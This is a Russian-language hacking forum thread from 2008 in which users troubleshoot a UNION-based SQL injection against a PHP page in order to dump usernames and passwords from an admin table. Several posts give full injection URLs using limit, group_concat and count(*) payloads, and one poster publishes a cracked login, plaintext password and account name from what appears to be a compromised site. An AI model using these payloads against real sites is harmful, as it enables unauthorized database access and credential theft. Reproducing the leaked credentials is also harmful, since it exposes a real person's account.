 |
|
27.12.2008, 16:31
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от Octave_Parango
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
|
|
|
27.12.2008, 16:37
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Сообщение от Nightmarе
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.
Пробовал, до полусотни докрутил.
|
|
|
|
27.12.2008, 16:43
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
2Octave_Parango дык мож там тока одна запись?)
|
|
|
|
27.12.2008, 16:50
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
С нами:
9507243
Репутация:
37
|
|
потому что таблица находится в другой базе
расшифровал хеш юзера, но почему то не заходит в аккаунт... (
login 1225532271
pass arnaud2007
name michamk
Странно..
|
|
|
|
27.12.2008, 16:56
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
j0ker13, что-то мне кажется, что так оно и есть.
|
|
|
|
27.12.2008, 17:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 Octave_Parango:
проверь так:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
|
|
|
|
27.12.2008, 17:21
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
Сообщение от Pashkela
2 Octave_Parango:
проверь так:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--
Отображается так же одна запись как и при limit 0,1
Получается там все одна запись?
|
|
|
|
27.12.2008, 17:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
да, 100%, иначе group_concat вытащил бы несколько записей по любому
и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.
Последний раз редактировалось Pashkela; 27.12.2008 в 17:30..
|
|
|
|
27.12.2008, 17:28
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Похоже на то...
|
|
|
|
27.12.2008, 17:30
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Я что-то пропустил. или count() отменили? )
Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
